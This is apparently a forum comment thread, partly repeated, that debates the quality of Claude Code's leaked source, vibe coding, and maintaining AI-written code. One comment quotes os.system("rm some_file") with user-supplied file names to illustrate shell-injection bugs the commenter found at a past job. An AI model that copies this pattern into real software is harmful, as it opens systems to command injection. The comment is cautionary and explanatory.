It’s truly strange that people keep citing the quality of Claude code’s leaked source as if it’s proof vibe coding doesn’t work.
If anything, it’s the exact opposite. It shows that you can build a crazy popular & successful product while violating all the traditional rules about “good” code.
I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked. I've worked at BigCos and startups, and a lot of the terrible code that makes it to production was shocking when I first started.
This isn't a dig at anyone, I've certainly shipped my share of bad code as well. Deadlines, despite my wishes sometimes, continue to exist. Sometimes you have to ship a hack to make a customer or manager happy, and then replacing those hacks with better code just never happens.
For that matter, the first draft of nearly anything I write is usually not great. I might just be stupid, but I doubt I'm unique; when I've written nice, beautiful, optimized code, it's usually a second or third draft, because ultimately I don't think I fully understand the problem and the assumptions I am allowed to make until I've finished the first draft. Usually for my personal projects, my first dozen or so commits will be pretty messy, and then I'll have cleanup branches that I merge to make the code less terrible.
This isn't inherently bad, but a lot of the time I am simply not given time to do a second or third draft of the code, because, again, deadlines, so my initial "just get it working" draft is what ships into production. I don't love it, and I kind of dread of some of the code with my name attached to it at BigCo ever gets leaked, but that's just how it is in the corporate world sometimes.
To my believe there was not a goal to write good code. The goal was maintainability and to keep it simple, so that people understand. People come and go, you constantly get to see foreign code and you have to do something with it.
Anyways, i see the maintainability hell coming onto us. I still wonder how i organize this with AI. I definitly do not want to touch it what is written by AI.
I think the industry-wide hope is that AI manages the AI-written code, but it’s unclear whether that’s actually going to work out in practice. Right now, my experience is that is dicey. I’ve had AI mess up a codebase to the point where I threw it away and restarted. Maybe I was doing it wrong, though, in that I was looking at the code and was increasingly horrified by the slop. I get the feeling that in this new world, we’re supposed to ignore how the sausage is made and just focus on the final outcome.
IME AI-native engineering requires a lot of infrastructure to make it viable. Teams who are just opening up cursor and putting it on "auto" and trying to one shot features may get stuff that works but is indeed slop.
Since the beginning of the year, I've been spearheading a low-stakes AI-native project (an internal tool). No one's written a single line of code. And we've learned so much from this experience. The first rule was our product manager, who is technical but isn't typically in the weeds, needs to be able to one-shot prompts with cursor auto. And so many rules stem from there, from e2e tests to ensure he doesn't break stuff, to custom linters to ensure that code lives in the right place, to architectural spec sheets so the LLM doesn't try to do raw DB queries from the client.
We're still not there, but we're getting closer and learning and improving every day.
I think the folks who are vibe coding a lot either aren't working in a team, or they are omitting the fact that they have spent a long time building harnesses to ensure the LLM doesn't run amok.
And I think the people who hate vibe coding are likely just asking Claude Code to do X without using Skills that have opinionated ways to do X.
All that said, I don't think we should ignore how the sausage is made at all. Part of what makes me able to move quickly in this project is knowing where stuff lives. I may not understand the line-by-line code, but if I know where to look to find out why I'm missing data that's in the DB, I can move a lot faster than if I have no idea what's going on in the codebase. Then when I find the problematic file or function, I can ask the LLM why it's like X and tell it it should be like Y.
Cool. Are you restricting the AI to be very focused on a function or an architectural blocks that is envisioned, or are you giving it more freedom? I seem to have less slop when I really constrain things, but that takes a lot of work (e.g., specs) and dialogue with the AI (“focus on X, now let’s design block Y,” etc.).
I give it freedom but with the predefined restrictions. I use a plug-in called Obra Superpowers. Whenever I want to start on a block of work, whether it's a ticket or if I just want to tackle tech debt, I start with the brainstorm command. I say something vague like "implement X" or "last time i tried to vibe code Y, Z happened. I don't want that to happen again. Let's improve the harness."
It'll ask follow questions, which I answer, then generate specs that I manually review. If it looks good, it'll generate a plan. If not then I'll give it feedback.
When the scope of work is well-defined (ie my boss says users should be able to do Y) then this process is fairly seamless.
When it's not well-defined then it does take a bit longer and more dialogue as you said. But because everything is documented and written down, we have a pretty good feedback loop (boss asks why it works like X, I can look at the generated spec/plan, or ask the AI to, to understand why).
Ok, so it’s constrained by specs, but you dialog with the AI and have it create the specs. I should try that. I’ve been creating my own specs and having it work from those and then iterating, but that’s not exactly quick and I find myself thinking, “At this rate I could do it faster myself.”
Yeah definitely agreed. I'm lucky I'm that my boss is willing to invest in this little experiment so the point isn't "can we do this faster manually" it's "how can we build our AI infrastructure such that it can actually be faster."
And also, I'm taking care of my infant daughter while working so my workflow is often "launch an AI agent from my computer while she's asleep, review plan on my phone while feeding or napping the little one, approve it and execute it" so it's often running when I'm not really in a mental space to be thinking deeply.
Yep this is especially true in the pre-product-market-fit phase. Most if not all of that code should be written to be thrown away. Any time you spend writing perfect code instead of your MVP is burnt runway and a chance for competitors to catch up.
Once you show PMF though the balance changes to long-term sustainability and maintainability.
What's going to be interesting is getting to a place where it generates better code than we would from specs. You can get better and better generated code by filling in the context the model infers. Do that long enough, and well, a perfect spec is just code.
To me, it instead sounds like you care about the code you produce. You judge it more harshly than you probably do other code. It sounds like you are also meeting deadlines, so I'd call that a success and more production than what a lot of people tend to put out into the world.
I often have a lot of time between projects, and am able to really think about things, and write the code that I'm happy with. Even when I do that, I do some more research, or work on another project, and immediately I'm picking apart sections of my code that I really took the time to "get right." Sometimes it can be worse if you are given vast amounts of time to build your solution, where some form of deadline may have pushed you to make decisions you were able to put off. At least that's my perspective on it, I feel like if you love writing software, you are going to keep improving nearly constantly, and look back at what you've done and be able to pick it apart.
To keep myself from getting too distressed over looking at past code now, I tend to look at the overall architecture and success of the project (in regards to the performing what it was supposed to, not necessarily monetarily). If I see a piece of code that I feel could have been written far better, I look at how it fits into the rest. I tend to work on very small teams, so I'm often making architecture decisions that touch large areas of the code, so this may just be from my perspective of not working on a large team. I still do think if you care about your craft, you will be harsh on yourself, more than you deserve.
This is the product that's claiming "coding is a solved problem" though.
I get a junior developer or a team of developers with varying levels of experience and a lot of pressure to deliver producing crummy code, but not the very tool that's supposed to be the state-of-the-art coder.
Sure, but as I stated, even "professional" code is pretty bad a lot of the time. If it's able to generate code that's as good as professional code, then maybe it is solved.
I don't actually think it's a solved problem, I'm saying that the fact that it generates terrible code doesn't necessarily mean that it doesn't have parity with humans.
The bet is that it will be trivial for them to invest in cleaning up Claude Code whenever they face real competitive pressure to do so. My best guess is that it's a bad bet - I don't think LLM agents have solved any of the fundamental problems that make it hard to convert janky bad code to polished good code. But Claude Code is capable in my experience of producing clean code when appropriately guided, so it's not that there's no choice but jank. They're intentionally underinvesting in code quality right now for the sake of iteration speed.
I mean, hasn't it learned from reading other's code? I don't think it can be any better than the common patterns and practices that it has been trained on. Some outlier of amazing code is probably not going to make much of a difference, unless I am completely misunderstanding LLMs (which I very well may be, and would gladly take any criticism on my take here).
> I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked.
Absolutely. The difference is that the amount of bad code that could be generated had an upper limit on it — how fast a human can type it out. With LLMs bad code can be shat out at warp speed.
> I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked.
At a place I worked at with their core product written in Python, it was exceptionally common for engineers to make shell calls for file operations that had easy Python-native functions.
For example, rather than os.remove("some_file"), they'd do os.system("rm some_file"). Sometimes, the file name being acted on included user input.
I found so many shell injections that could have easily been prevented.
This is not just true of code; it is true of everything - the whole world is held together with spit, bailing wire, a prayer, and some old dude who remembers.
Bad code works fine until it doesn't. In my experience, with humans, doing the right thing is worth it over doing the bad thing if your time horizon is a few months. Once you're in years, absolutely do the right thing, you're actually throwing time away if you don't. And I don't mean "big refactor", I mean at-change-time, when you think "this change feels like an icky hack."
For LLMs, I don't really know. I only have a couple years experience at that.
1. "Vibe coding" is a spectrum of how much human supervision (and/or scaffolding in the form of human-written tests and/or specs) is involved.
2. The problem with "bad code" has nothing to do with the short-term success of the product but with the ability to evolve it successfully over time. In other words, it's about long-term success, not short-term success.
3. Perhaps most importantly, Claude Code is a fairly simple product at its core, and almost all its value comes from the model, not from its own code (and the same is true on the cost side). Claude Code is relatively a low stakes product. This means that the problems caused by bad code matter less in this instance, and they're managed further by Claude Code not being at the extreme "vibey" end of the spectrum.
So AI aside, Claude Code is proof that if you pour years and many billions into a product, it can be a success even if the code in the narrow and small UI layer isn't great.
Still, it's probably true that Claude Code (etc) will be more successful working on clean, well-structured code, just like human coders are. So short-term, maybe not such a big deal, but long-term I think it's still an unresolved issue.
I'm skeptical of the whole thing, it almost seems like a marketing campaign to encourage developers to use more tokens.
My experience as a software engineer, including with Claude Code itself, is that the more code you have, the more bugs there are. It quickly turns into a game of Whac-a-Mole where you fix 1 bug and 2 new bugs appear.
Looking at the functionality of Claude code. There is no way it requires 500k lines of code as claimed. It would make it very difficult to debug... Though it seems they have a team of 10 people which is a lot for a CLI wrapper.
It's more likely that somebody ran the real code through an agent to intentionally obfuscate it into a more complicated form before they leaked it. This is trivial to do with LLMs. You can take any short function of a couple of lines and turn it into a function hundreds of lines long which does the exact same thing.
It's actually a great way to obfuscate code in the AI era because LLMs are good at creating complexity and not good at reducing it. I've done tests where I ask Claude to turn a simple 1 line function which adds two numbers together into a 100 line function and when I asked it to simplify it down, it couldn't reduce it back to its original simple form after multiple attempts. I had to explicitly tell it what the original form of the function was for it to clean up properly. This approach doesn't scale to a whole codebase. Imagine doing this to an entire codebase, it would take more time for you to read and understand each function to tell the LLM how to clean it up than just re-generating the entire app from scratch.
The problem with large amounts of code is not only that it's harder to maintain and extend, it's often less performant.
While LLMs can allow us to get more out of bad code, they will allow us to get even more value out of the equivalent good code when it comes to maintainability, reliability and efficiency.
One truism about coding agents is that they struggle to work with bad code. Code quality matters as much as always, the experts say, and AI agents (left unfettered) produce bad code at an unprecedented rate. That's why good practices matter so much! If you use specs and test it like so and blah blah blah, that makes it all sustainable. And if anyone knows how to do it right, presumably it's Anthropic.
This codebase has existed for maybe 18 months, written by THE experts on agentic coding. If it is already unintelligible, that bodes poorly for how much it is possible to "accelerate" coding without taking on substantial technical debt.
> That wouldn’t even be a big violation of the vibe coding concept. You’re reading the innards a little but you’re only giving high-level, conceptual, abstract ideas about how problems should be solved. The machine is doing the vast majority, if not literally all, of the actual writing.
Claude Code is being produced at AI Level 7 (Human specced, bots coded), whereas the author is arguing that AI Level 6 (Bots coded, human understands somewhat) yields substantially better results. I happen to agree, but I'd like to call out that people have wildly different opinions on this; some people say that the max AI Level should be 5 (Bots coded, human understands completely), and of course some people think that you lose touch with the ground if you go above AI Level 2 (Human coded with minor assists).
My favorite uses of Claude code is to do code quality improvements that would be seen as a total waste of time if I was doing them by hand, but are perfectly fine when they are done mostly for free. Looking for repetitive patterns in unit tests/functional tests. Making sure that all json serialization is done in similar patterns unless there's a particularly good reason. Looking for functions that are way too complicated, or large chunks of duplication.
The PRs that it comes with are rarely even remotely controversial, shrink the codebase, and are likely saving tokens in the end when working on a real feature, because there's less to read, and it's more boring. Some patterns are so common you can just write them down, and throw them at different repos/sections of a monorepo. It's the equivalent of linting, but at a larger scale. Make the language hesitant enough, and it won't just be a steamroller either, and mostly fix egregrious things.
But again, this is the opposite of the "vibe coding" idea, where a feature appears from thin air. Vibe Linting, I guess.
It’s so strange. I think there’s a few different groups:
- Shills or people with a financial incentive
- Software devs that either never really liked the craft to begin with or who have become jaded over time and are kind of sick of it.
- New people that are actually experiencing real, maybe over-excitement about being able to build stuff for the first time.
Forgetting the first group as that one is obvious.
I’ve encountered a heap of group 2. They’re the ones sick of learning new things, for whatever reason. Software work has become a grind for them and vibe coding is actually a relief.
Group 3 I think are mostly the non-coders who are genuinely feeling that rush of being able to will their ideas into existence on a computer. I think AI-assisted coding could actually be a great on-ramp here and we should be careful not to shit on them for it.
This is nearly as dumb as the post that "Claude code is useless because your home built "Slack App" won't be globally distributed, with multi-primary databases and redis cache layer... and won't scale beyond 50k users".
As if 97% of web apps aren't just basic CRUD with some integration to another system if you are lucky.
In my opinion there are two main groups on the spectrum of "vibe coding". The non technical users that love it but don't understand software engineering enough to know what it takes to make a production grade product. The opposite are the AI haters that used chatgpt 3.5 and decided LLM code is garbage.
Both of these camps are the loudest voices on the internet, but there is a quiet but extremely productive camp somewhere in the middle that has enough optimism, open mindedness along with years of experience as an engineer to push Claude Code to its limit.
I read somewhere that the difference between vibe coding and "agentic engineering" is if you are able to know what the code does. Developing a complex website with claude code is not very different than managing a team of off shore developers in terms of risks.
Unless you are writing software for medical devices, banking software, fighter jets, etc... you are doing a disservice to your career by actively avoiding using LLMs as a tool in developing software.
I have used around $2500 in claude code credits (measured with bunx ccusage ) the last 6 months, and 95% of what was written is never going to run on someone else's computer, yet I have been able to get ridiculous value out of it.
This reminds me of Clayton Christensen's theory of disruption.
Disruption happens when firms are disincentivized to switch to the new thing or address the new customer because the current state of it is bad, the margins are low. Intel missed out on mobile because their existing business was so excellent and making phone chips seemed beneath them.
The funny thing is that these firms are being completely rational. Why leave behind high margins and your excellent full-featured product for this half-working new paradigm?
But then eventually, the new thing becomes good enough and overtakes the old one. Going back to the Intel example, they felt this acutely when Apple switched their desktops to ARM.
For now, Claude Code works. It's already good enough. But unless we've plateaued on AI progress, it'll surpass hand crafted equivalents on most metrics.
Vibe coders' argument* is that quality of code does not matter because LLMs can iterate much much faster then humans do.
Consider this overly simplified process of writing a logic to satisfy a requirement:
1. Write code
2. Verify
3. Fix
We, humans, know the cost of each step is high, so we come up various way to improve code quality and reduce cognitive burden. We make it easier to understand when we have to revisit.
On the other hand, LLMs can understand** a large piece of code quickly***, and in addition, compile and run with agentic tools like Claude Code at the cost of token****. Quality does not matter to vibe coders if LLMs can fill the function logic that satisfies the requirement by iterating the aforementioned steps quickly.
I don't agree with this approach and have seen too many things broken from vibe code, but perhaps they are right as LLMs get better.
* Anecdotal
** I see LLM as just a probabilistic function so it doesn't "reason" like humans do. It's capable of highly advanced problem solving yet it also fails at primitive task.
*** Relative to human
**** Cost of token I believe is relatively cheaper compared to a full-time engineer and it'll get cheaper over time.
I think it's becoming clear we're not anywhere near AGI, we figured out how to vectorize our knowledge bases and replay it back. We have a vectorized knowledge base, not an AI.
I don't think this has anything to do with dogfooding. As the author says, dogfooding is about consuming your own product. You can consume Claude Code and still be a reasonable engineer. It's difficult to tell what's actually happening without an insider view but, IMHO, this is just the typical go-fever of start-up thinking: produce loads of functionality as quickly as possible and don't think about quality. It was try before AI, and it will be true after AI.
Also, to those who say "this is proof that code quality doesn't matter any more", let's have this chat 5 years from now when they're crumbling under the weight of their own technical debt :)
> Then I explain what I think should be done and we’ll keep discussing it until I stop having more thoughts to give and the machine stops saying stupid things which need correcting.
Users like the author must be the most valuable Claude asset, because AI itself isn't a product — people's feedback that shapes output is.
"Laughing" at how bad the code in Claude Code is really seems to be missing the forest for the trees. Anthropic didn't set out to build a bunch of clean code when writing Claude Code. They set out to make a bunch of money, and given CC makes in the low billions of ARR, is growing rapidly, and is the clear market leader, it seems they succeeded. Given this, you would think you'd would want to approach the strategy that Anthropic used with curiosity. How can we learn from what they did?
There's nothing wrong with saying that Claude Code is written shoddily. It definitely is. But I think it should come with the recognition that Anthropic achieved all of its goals despite this. That's pretty interesting, right? I'd love to be talking about that instead.
They think their dog food tastes great now, not because they improved it any, but because they've forgotten the taste of human food. Karmically hilarious.
people that 'violate the rules of good code' when vibe-coding are largely people that don't know the rules of good code to begin with.
want code that isn't shit? embrace a coding paradigm and stick to it without flip-flopping and sticking your toe into every pond, use a good vcs, and embrace modularity and decomposability.
the same rules when 'writing real code'.
9/10 times when I see an out-of-control vibe coded project it sorta-kinda started as OOP before sorta-kinda trying to be functional and so on. You can literally see the trends change mid-code. That would produce shit regardless of what mechanism used such methods, human/llm/alien/otherwise.
> In this particular case, a human could have told the machine: “There’s a lot of things that are both agents and tools. Let’s go through and make a list of all of them, look at some examples, and I’ll tell you which should be agents and which should be tools. We’ll have a discussion and figure out the general guidelines. Then we’ll audit the entire set, figure out which category each one belongs in, port the ones that are in the wrong type, and for the ones that are both, read through both versions and consolidate them into one document with the best of both.”
But that isn't the hard part. The hard part is that some people are using the tool versions and some are using the agent versions, so consolidating them one way or another will break someone's workflow, and that incurs a real actual time cost, which means this is now a ticket that needs to be prioritized and scheduled instead of being done for free.
This definitely reminds me of a lot of Nassim Taleb's work, which to say -- Anthropic may not be behaving intelligently but they are at least somewhat behaving honorably, -- if you're going to put out a dangerous product, a moral minimum is to use it heavily yourself so as to be exposed to the risk it creates.
Vibe coding is like building castles in a sandbox, it is fun but nobody would live in them.
Once you have learned enough from playing with sand castles, you can start over to build real castles with real bricks (and steel if you want to build skyscraper). Then it is your responsibility to make sure that they would not collapse when people move it.
> So pure vibe coding is a myth. But they’re still trying to do it, and this leads to some very ridiculous outcomes
creating a product in a span of mere months that millions of developers use everday is opposite of ridiculous. we wouldn't even have known about the supposed ridiculousness of code if it hadnt leaked.
It looks vibe coding, or at AI coding in general, has been challenging a few empirical laws:
- Brooks' No Silver Bullet: no single technology or management technique will yield a 10-fold productivity improvement in software development within a decade. If we write a spec that details everything we want, we would write soemthing as specific as code. Currently people seem to believe that a lot of the fundamentals are well covered by existing code, so a vague lines of "build me XXX with YYY" can lead to amazing results because AI successfully transfers the world-class expertise of some engineers to generate code for such prompt, so most of the complex turns to be accidental, and we only need much fewer engineers to handle essential complexities.
- Kernighan's Law, which says debugging is twice as hard as writing the code in the first place. Now people are increasingly believing that AI can debug way faster than human (most likely because other smart people have done similar debugging already). And in the worst case, just ask AI to rewrite the code.
- Dijkstra on the foolishness of programming in natural language. Something along the line of which a system described in natural language becomes exponentially harder to manage as its size increases, whereas a system described in formal symbols grows linearly in complexity relative to its rules. Similar to above, people believe that the messiness of natural language is not a problem as long as we give detailed enough instructions to AI, while letting AI fills in the gaps with statistical "common sense", or expertise thereof.
- Lehman’s Law, which states that a system's complexity increases as it evolves, unless work is done to maintain or reduce it. Similar to above, people start to believe otherwise.
- And remotely Coase's Law, which argues that firms exist because the transaction costs of using the open market are often higher than the costs of directing that same work internally through a hierarchy. People start to believe that the cost of managing and aligning agents is so low that one-person companies that handle large number of transactions will appear.
Also, ultimately Jevons Paradox, as people worry that the advances in AI will strip out so much demand that the market will slash more jobs than it will generate. I think this is the ultimate worry of many software engineers. Luddites were rediculed, but they were really skilled craftsmen who spent years mastering the art of using those giant 18-pound shears. They were the staff engineers of the 19th-century textile world. Mastering those 18-pound shears wasn't just a job but an identity, a social status, and a decade-long investment in specialized skills. Yeah, Jevons Paradox may bring new jobs eventually, but it may not reduce the blood and tears of the ordinary people.
How credible are the claims that the Claude Code source code is bad?
AI naysayers are heavily incentivized to find fault with it, but in my experience it's pretty rare to see a codebase of that size where it's not easy to pick out "bad code" examples.
Are there any relatively neutral parties who've evaluated the code and found it to be obviously junk?
The ship has sailed. Vibe coding works. It will only work better in the future.
I have been programming for decades now, I have managed teams of developers. Vibe coding is great, specially in the hands of experts that know what they are doing.
Deal with it because it is not going to stop. In the near future it will be local and 100x faster.
Where is the evidence that people are obsessed with one-shotting and not doing the iterative back-and-forth, prompt-and-correct system he describes here? It feels like he is attacking a strawman.
I vibe code.
but I also remember the days I had ZERO KNOWLEDGE of what needs to be done, and I would hammer the keyboard with garbage code from stack overflow and half baked documentations plus some native guessing of human nature.
the end result was me understanding what the hell was going on.
those days are over.
The whole idea of someone's code being perfectly handcrafted may have been true in 1998, but any project you start now builds on a tower of open source libraries frameworks, and container images - probably running on someone else's infra. Nobody is really starting from a blank page anymore.
Every so often, some Windows source gets leaked, and people have a lot of fun laughing at how bad it is. If the source of, say, PeopleSoft were leaked, people would have a lot of fun laughing at how bad it is. If the source of Hogan Deposits were leaked, it would kill anyone who saw it.
It must feel so good to make a blog post that hates on vibecoding and get your mandated recognition for a regurgitated point. Nobody is even arguing that this article said anything novel, it’s just pure hate
"figure out which category each one belongs in, port the ones that are in the wrong type, and for the ones that are both, read through both versions and consolidate them into one document with the best of both.”
I've been a skeptic about LLMs in general since I first heard of them. And I'm a sysadmin type, more comfortable with python scripts than writing "real" software. No formal education in coding at all other than taking Harvard's free online python course a few years ago.
So I set out to build an app with CC just to see what it's like. I currently use Copilot (copilot.money) to track my expenditures, but I've become enamored with sankey diagrams. Copilot doesn't have this charting feature, so I've been manually exporting all my transactions and massaging them in the sankey format. It's a pain in the butt, error prone, and my python skills are just not good enough to create a conversion script. So I had CC do it. After a few minutes of back and forth, it was working fine. I didn't care about spaghetti code at all.
So next I thought, how about having it generate the sankey diagrams (instead of me using sankeymatic's website). 30 minutes later, it had a local website running that was doing what I had been manually doing for months.
Now I was hooked. I started asking it to build a native GUI version (for macOS) and it dutifully cranked out a version using pyobjC etc. After ironing out a few bugs it was usable in less than 30 min. Feature adds consumed all my tokens for the day and the next day I was brimming with changes. Burned through that days tokens as well and after 3 days (I'm on the el cheapo plan), I have an app that basically does what I want in a reasonable attractive, and accurate manner.
I have no desire to look at the code. The size is relatively small, and resource usage is small as well. But it solved this one niche problem that I never had the time or skill to solve.
Is this a good thing? Will I be downvoted to oblivion? I don't know. I'm very very concerned about the long term impact of LLMs on society, technology and science. But it's very interesting to see the other side of what people are claiming.
the middle ground nobody talks about is using AI for the boring infrastructure stuff (stripe integration, auth boilerplate, static site scaffolding) and writing the actual business logic yourself. i've shipped like 3 side projects this year using that approach and the code quality is fine because im not vibe coding the parts that actually matter
Vibe coding for me was a paradigm shift on AI as a tool I can utilize to unlock more. I started with no-code solutions, and never could get to the last 10% of production-ready. Then saw someone on X mention Cursor. Avoided it, avoided it then said fuck it and dove in, and now I use it daily and it's been a game changer. Prior to all this, I had front-end experience at best... like modifying Wordpress themes back in the day, etc. - I've since shipped two software platforms that are basically AI OS for certain verticals, and an intricate iPhone app, etc... None of this was possible for me before six months ago. Big fan of the IDE experience. I tried Claude Code but I don't like not knowing what's going on the way I see it in Cursor. The first platform I was idea to market in 3 weeks, then the next platform, it took me a day. Not MVP, but fully built out. That's insane. My first startup was an iPhone app back during iOS7, and we had to outsource V1, and it took six months and cost $50k. It was a terrible MVP. Lol. In comparison, I'm doing what I'm doing in Cursor on the $60 plan.
All this to say, Vibe Coding as a no-code, even if the solution can hook api's for you, etc, nah. It should be a gateway at best to fully understand and build via agentic development.
512 comments
If anything, it’s the exact opposite. It shows that you can build a crazy popular & successful product while violating all the traditional rules about “good” code.
This isn't a dig at anyone, I've certainly shipped my share of bad code as well. Deadlines, despite my wishes sometimes, continue to exist. Sometimes you have to ship a hack to make a customer or manager happy, and then replacing those hacks with better code just never happens.
For that matter, the first draft of nearly anything I write is usually not great. I might just be stupid, but I doubt I'm unique; when I've written nice, beautiful, optimized code, it's usually a second or third draft, because ultimately I don't think I fully understand the problem and the assumptions I am allowed to make until I've finished the first draft. Usually for my personal projects, my first dozen or so commits will be pretty messy, and then I'll have cleanup branches that I merge to make the code less terrible.
This isn't inherently bad, but a lot of the time I am simply not given time to do a second or third draft of the code, because, again, deadlines, so my initial "just get it working" draft is what ships into production. I don't love it, and I kind of dread of some of the code with my name attached to it at BigCo ever gets leaked, but that's just how it is in the corporate world sometimes.
There are some cases where the most profitable code is also good code. We like those.
But in most (99%+) cases, the code is not going to survive contact with the market and so spending any time on making it good is wasted.
Anyways, i see the maintainability hell coming onto us. I still wonder how i organize this with AI. I definitly do not want to touch it what is written by AI.
Since the beginning of the year, I've been spearheading a low-stakes AI-native project (an internal tool). No one's written a single line of code. And we've learned so much from this experience. The first rule was our product manager, who is technical but isn't typically in the weeds, needs to be able to one-shot prompts with cursor auto. And so many rules stem from there, from e2e tests to ensure he doesn't break stuff, to custom linters to ensure that code lives in the right place, to architectural spec sheets so the LLM doesn't try to do raw DB queries from the client.
We're still not there, but we're getting closer and learning and improving every day.
I think the folks who are vibe coding a lot either aren't working in a team, or they are omitting the fact that they have spent a long time building harnesses to ensure the LLM doesn't run amok.
And I think the people who hate vibe coding are likely just asking Claude Code to do X without using Skills that have opinionated ways to do X.
All that said, I don't think we should ignore how the sausage is made at all. Part of what makes me able to move quickly in this project is knowing where stuff lives. I may not understand the line-by-line code, but if I know where to look to find out why I'm missing data that's in the DB, I can move a lot faster than if I have no idea what's going on in the codebase. Then when I find the problematic file or function, I can ask the LLM why it's like X and tell it it should be like Y.
It'll ask follow questions, which I answer, then generate specs that I manually review. If it looks good, it'll generate a plan. If not then I'll give it feedback.
When the scope of work is well-defined (ie my boss says users should be able to do Y) then this process is fairly seamless.
When it's not well-defined then it does take a bit longer and more dialogue as you said. But because everything is documented and written down, we have a pretty good feedback loop (boss asks why it works like X, I can look at the generated spec/plan, or ask the AI to, to understand why).
And also, I'm taking care of my infant daughter while working so my workflow is often "launch an AI agent from my computer while she's asleep, review plan on my phone while feeding or napping the little one, approve it and execute it" so it's often running when I'm not really in a mental space to be thinking deeply.
Once you show PMF though the balance changes to long-term sustainability and maintainability.
What's going to be interesting is getting to a place where it generates better code than we would from specs. You can get better and better generated code by filling in the context the model infers. Do that long enough, and well, a perfect spec is just code.
We do live in interesting times.
> Any time you spend writing perfect code instead of your MVP is burnt runway
This. Once we crashed a product/company becaues of "we want it to be engineered perfectly" :-X
Both when initially writing the code and later when maintaining it.
Good code dramatically reduce bugs and makes the remaining bugs more visible.
I spend almost zero time fixing bugs. Because there aren't many. Not a brag. Just the truth.
I often have a lot of time between projects, and am able to really think about things, and write the code that I'm happy with. Even when I do that, I do some more research, or work on another project, and immediately I'm picking apart sections of my code that I really took the time to "get right." Sometimes it can be worse if you are given vast amounts of time to build your solution, where some form of deadline may have pushed you to make decisions you were able to put off. At least that's my perspective on it, I feel like if you love writing software, you are going to keep improving nearly constantly, and look back at what you've done and be able to pick it apart.
To keep myself from getting too distressed over looking at past code now, I tend to look at the overall architecture and success of the project (in regards to the performing what it was supposed to, not necessarily monetarily). If I see a piece of code that I feel could have been written far better, I look at how it fits into the rest. I tend to work on very small teams, so I'm often making architecture decisions that touch large areas of the code, so this may just be from my perspective of not working on a large team. I still do think if you care about your craft, you will be harsh on yourself, more than you deserve.
I get a junior developer or a team of developers with varying levels of experience and a lot of pressure to deliver producing crummy code, but not the very tool that's supposed to be the state-of-the-art coder.
I don't actually think it's a solved problem, I'm saying that the fact that it generates terrible code doesn't necessarily mean that it doesn't have parity with humans.
> I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked.
Absolutely. The difference is that the amount of bad code that could be generated had an upper limit on it — how fast a human can type it out. With LLMs bad code can be shat out at warp speed.
> and then replacing those hacks with better code just never happens
Yeah, we even have an idiom for this - "Temporary is always permanent"
> I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked.
At a place I worked at with their core product written in Python, it was exceptionally common for engineers to make shell calls for file operations that had easy Python-native functions.
For example, rather than
os.remove("some_file"), they'd doos.system("rm some_file"). Sometimes, the file name being acted on included user input.I found so many shell injections that could have easily been prevented.
where uptime monitoring was Page Refresh by QA team.
where there was no centralized logs
postgres had no backup or replication or anything
For LLMs, I don't really know. I only have a couple years experience at that.
2. The problem with "bad code" has nothing to do with the short-term success of the product but with the ability to evolve it successfully over time. In other words, it's about long-term success, not short-term success.
3. Perhaps most importantly, Claude Code is a fairly simple product at its core, and almost all its value comes from the model, not from its own code (and the same is true on the cost side). Claude Code is relatively a low stakes product. This means that the problems caused by bad code matter less in this instance, and they're managed further by Claude Code not being at the extreme "vibey" end of the spectrum.
So AI aside, Claude Code is proof that if you pour years and many billions into a product, it can be a success even if the code in the narrow and small UI layer isn't great.
> you can build a crazy popular & successful product while violating all the traditional rules about “good” code
which has always been true
My experience as a software engineer, including with Claude Code itself, is that the more code you have, the more bugs there are. It quickly turns into a game of Whac-a-Mole where you fix 1 bug and 2 new bugs appear.
Looking at the functionality of Claude code. There is no way it requires 500k lines of code as claimed. It would make it very difficult to debug... Though it seems they have a team of 10 people which is a lot for a CLI wrapper.
It's more likely that somebody ran the real code through an agent to intentionally obfuscate it into a more complicated form before they leaked it. This is trivial to do with LLMs. You can take any short function of a couple of lines and turn it into a function hundreds of lines long which does the exact same thing.
It's actually a great way to obfuscate code in the AI era because LLMs are good at creating complexity and not good at reducing it. I've done tests where I ask Claude to turn a simple 1 line function which adds two numbers together into a 100 line function and when I asked it to simplify it down, it couldn't reduce it back to its original simple form after multiple attempts. I had to explicitly tell it what the original form of the function was for it to clean up properly. This approach doesn't scale to a whole codebase. Imagine doing this to an entire codebase, it would take more time for you to read and understand each function to tell the LLM how to clean it up than just re-generating the entire app from scratch.
The problem with large amounts of code is not only that it's harder to maintain and extend, it's often less performant.
While LLMs can allow us to get more out of bad code, they will allow us to get even more value out of the equivalent good code when it comes to maintainability, reliability and efficiency.
This codebase has existed for maybe 18 months, written by THE experts on agentic coding. If it is already unintelligible, that bodes poorly for how much it is possible to "accelerate" coding without taking on substantial technical debt.
> That wouldn’t even be a big violation of the vibe coding concept. You’re reading the innards a little but you’re only giving high-level, conceptual, abstract ideas about how problems should be solved. The machine is doing the vast majority, if not literally all, of the actual writing.
Claude Code is being produced at AI Level 7 (Human specced, bots coded), whereas the author is arguing that AI Level 6 (Bots coded, human understands somewhat) yields substantially better results. I happen to agree, but I'd like to call out that people have wildly different opinions on this; some people say that the max AI Level should be 5 (Bots coded, human understands completely), and of course some people think that you lose touch with the ground if you go above AI Level 2 (Human coded with minor assists).
[0] https://visidata.org/ai
The PRs that it comes with are rarely even remotely controversial, shrink the codebase, and are likely saving tokens in the end when working on a real feature, because there's less to read, and it's more boring. Some patterns are so common you can just write them down, and throw them at different repos/sections of a monorepo. It's the equivalent of linting, but at a larger scale. Make the language hesitant enough, and it won't just be a steamroller either, and mostly fix egregrious things.
But again, this is the opposite of the "vibe coding" idea, where a feature appears from thin air. Vibe Linting, I guess.
- Shills or people with a financial incentive
- Software devs that either never really liked the craft to begin with or who have become jaded over time and are kind of sick of it.
- New people that are actually experiencing real, maybe over-excitement about being able to build stuff for the first time.
Forgetting the first group as that one is obvious.
I’ve encountered a heap of group 2. They’re the ones sick of learning new things, for whatever reason. Software work has become a grind for them and vibe coding is actually a relief.
Group 3 I think are mostly the non-coders who are genuinely feeling that rush of being able to will their ideas into existence on a computer. I think AI-assisted coding could actually be a great on-ramp here and we should be careful not to shit on them for it.
As if 97% of web apps aren't just basic CRUD with some integration to another system if you are lucky.
99% of companies won't even have 50k users.
